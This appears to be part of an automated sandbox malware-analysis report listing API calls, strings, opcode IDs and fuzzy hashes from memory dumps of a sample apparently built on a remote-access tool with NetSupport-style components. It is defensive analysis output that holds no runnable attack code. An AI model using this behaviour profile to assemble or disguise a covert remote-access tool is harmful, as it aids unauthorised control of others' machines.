                                                                                        • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                      • GetTickCount.KERNEL32 ref: 111376A1
                                                                                      • _memset.LIBCMT ref: 111376E3
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                      • _strrchr.LIBCMT ref: 11137708
                                                                                      • _free.LIBCMT ref: 1113775A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                      • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                      • API String ID: 711243594-1270230032
                                                                                      • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                      • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                      • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                      • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                      APIs
                                                                                      • ioctlsocket.WSOCK32 ref: 6C5D7642
                                                                                      • connect.WSOCK32(00000000,?,?), ref: 6C5D7659
                                                                                      • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6C5D7660
                                                                                      • _memmove.LIBCMT ref: 6C5D76D3
                                                                                      • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C5D76F3
                                                                                      • GetTickCount.KERNEL32 ref: 6C5D7717
                                                                                      • ioctlsocket.WSOCK32 ref: 6C5D775C
                                                                                      • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5D7762
                                                                                      • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C5D777A
                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6C5D778B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                      • String ID: *BlockingIO$ConnectTimeout$General
                                                                                      • API String ID: 4218156244-2969206566
                                                                                      • Opcode ID: ce216dd1b8016a28e30687b62eeb501ad2fd43b4a61ae7b04e5e5c1d2e8c6ab6
                                                                                      • Instruction ID: c61fb15bd987e2e7e68fd7515e20124b0a7e663a183b22da689ba305607cbf09
                                                                                      • Opcode Fuzzy Hash: ce216dd1b8016a28e30687b62eeb501ad2fd43b4a61ae7b04e5e5c1d2e8c6ab6
                                                                                      • Instruction Fuzzy Hash: A4414D71900314DBE720DB68CC48BDE73BAEF84305F41449AE51993A41EB70AE49CFA9
                                                                                      APIs
                                                                                        • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                        • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                        • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                        • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                        • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                        • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                      • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                      • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                      • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                      • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                      • GetDC.USER32(00000000), ref: 11133F03
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                      • CreateWindowExA.USER32(00000001,NSMWClass,0286E260,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                      • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                      • API String ID: 1594747848-1114959992
                                                                                      • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                      • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                      • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                      • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                      APIs
                                                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,A1BC2D8B,?,00000000,00000000), ref: 1102CE44
                                                                                      • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                      • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                      • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                      • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                      • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                      • API String ID: 83693535-2077998243
                                                                                      • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                      • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                      • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                      • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 11132C60
                                                                                      • GetTickCount.KERNEL32 ref: 11132C91
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                      • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$FolderPathwsprintf
                                                                                      • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                      • API String ID: 1170620360-4157686185
                                                                                      • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                      • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                      • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                      • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                      • _memset.LIBCMT ref: 1114512D
                                                                                        • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                      • _strncpy.LIBCMT ref: 111451FA
                                                                                        • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                      • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                      • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                      • API String ID: 3299820421-2117887902
                                                                                      • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                      • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                      • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                      • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                      APIs
                                                                                      • _strtok.LIBCMT ref: 11026C26
                                                                                      • _strtok.LIBCMT ref: 11026C60
                                                                                      • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strtok$Sleep
                                                                                      • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                      • API String ID: 2009458258-3774545468
                                                                                      • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                      • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                      • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                      • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6C5E67B5), ref: 6C5D8D6B
                                                                                        • Part of subcall function 6C5D4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6C5D8DC8), ref: 6C5D4F78
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 6C5D8DCB
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6C5D8DD8
                                                                                      • FreeLibrary.KERNEL32(?), ref: 6C5D8EBF
                                                                                        • Part of subcall function 6C5D4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C5D4FC4
                                                                                        • Part of subcall function 6C5D4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C5D8E0D,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FE4
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C5D8EAE
                                                                                        • Part of subcall function 6C5D5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
                                                                                        • Part of subcall function 6C5D5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034
                                                                                        • Part of subcall function 6C5D2420: _strrchr.LIBCMT ref: 6C5D242E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                      • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                      • API String ID: 2714439535-3484705551
                                                                                      APIs
                                                                                        • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                      • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                      • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                      • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                      • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                      • GetLastError.KERNEL32 ref: 11102CB1
                                                                                      • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                      • GetLastError.KERNEL32 ref: 11102CCF
                                                                                      Strings
                                                                                      • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                      • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                      • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                      • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                      • API String ID: 2036220054-60805735
                                                                                      APIs
                                                                                      • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                      • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                      • wsprintfA.USER32 ref: 1115E3C8
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                      • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                      • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                      • API String ID: 1734919802-1728070458
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • std::exception::exception.LIBCMT ref: 1111013A
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                      • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                      • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                      • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                      • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                      • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                      • API String ID: 1976012330-1024648535
                                                                                      APIs
                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,A1BC2D8B,00000000,?), ref: 1115BA67
                                                                                      • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                      • wsprintfW.USER32 ref: 1115BAA7
                                                                                      • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                      • wsprintfW.USER32 ref: 1115BB67
                                                                                      • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                      • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                      • API String ID: 3050498177-823534439
                                                                                      APIs
                                                                                      • _calloc.LIBCMT ref: 6C5E2FBB
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E300D
                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 6C5E301B
                                                                                      • _calloc.LIBCMT ref: 6C5E303B
                                                                                      • _memmove.LIBCMT ref: 6C5E3049
                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 6C5E307F
                                                                                      • SetEvent.KERNEL32(00000318,?,?,?,?,?,?,?,?,?,?,?,?,?,?,939E34B3), ref: 6C5E308C
                                                                                        • Part of subcall function 6C5E28D0: wsprintfA.USER32 ref: 6C5E2965
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                      • String ID: a3^l$a3^l
                                                                                      • API String ID: 3178096747-1531287518
                                                                                      • Opcode ID: 3391fb66f8c9279749039ce9bdf7013c98a783aec3d5853591469d329c930f3b
                                                                                      • Instruction ID: b07ff557ca466e130170c4e88f318dbd3eb09bff7e07ea863bff7de938e3be89
                                                                                      • Opcode Fuzzy Hash: 3391fb66f8c9279749039ce9bdf7013c98a783aec3d5853591469d329c930f3b
                                                                                      • Instruction Fuzzy Hash: D34166B5D00209AFDB00DFA9CC45AEFB7B8EB8C305F00851AE515E7640E771AA058BA1
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6C5F0F2B,6E272756,00000000,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?,00000080), ref: 6C5F0D48
                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6C5F0D5B
                                                                                      • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6C61CB4C,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?,00000080), ref: 6C5F0D76
                                                                                      • _malloc.LIBCMT ref: 6C5F0D8C
                                                                                        • Part of subcall function 6C5F1B69: __FF_MSGBANNER.LIBCMT ref: 6C5F1B82
                                                                                        • Part of subcall function 6C5F1B69: __NMSG_WRITE.LIBCMT ref: 6C5F1B89
                                                                                        • Part of subcall function 6C5F1B69: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C5FD3C1,6C5F6E81,00000001,6C5F6E81,?,6C5FF447,00000018,6C617738,0000000C,6C5FF4D7), ref: 6C5F1BAE
                                                                                      • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?), ref: 6C5F0D9F
                                                                                      • _free.LIBCMT ref: 6C5F0D84
                                                                                        • Part of subcall function 6C5F1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6C5F1C13
                                                                                        • Part of subcall function 6C5F1BFD: GetLastError.KERNEL32(00000000), ref: 6C5F1C25
                                                                                      • _free.LIBCMT ref: 6C5F0DAF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AdaptersAddressesHeap_free$AddressAllocErrorFreeLastLibraryLoadProc_malloc
                                                                                      • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                      • API String ID: 3205077458-1843585929
                                                                                      • Opcode ID: f7d7d0567c885f62fea874b15115aee20e00d0644c9aa3f9200b4ec4794edaa5
                                                                                      • Instruction ID: 5f63a6c4c531cfa2697ff8420c0a1c5ae77eb827c9b6ee89afed28c04b5278e4
                                                                                      • Opcode Fuzzy Hash: f7d7d0567c885f62fea874b15115aee20e00d0644c9aa3f9200b4ec4794edaa5
                                                                                      • Instruction Fuzzy Hash: 0001D4F5200341ABE7289B759C85F5776A89B80B05F24482DF566CBA80EB71F846CB64
                                                                                      APIs
                                                                                        • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                        • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                      • _memset.LIBCMT ref: 11145485
                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                      • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                      • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                      • API String ID: 4251163631-545709139
                                                                                      • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                      • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                      • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
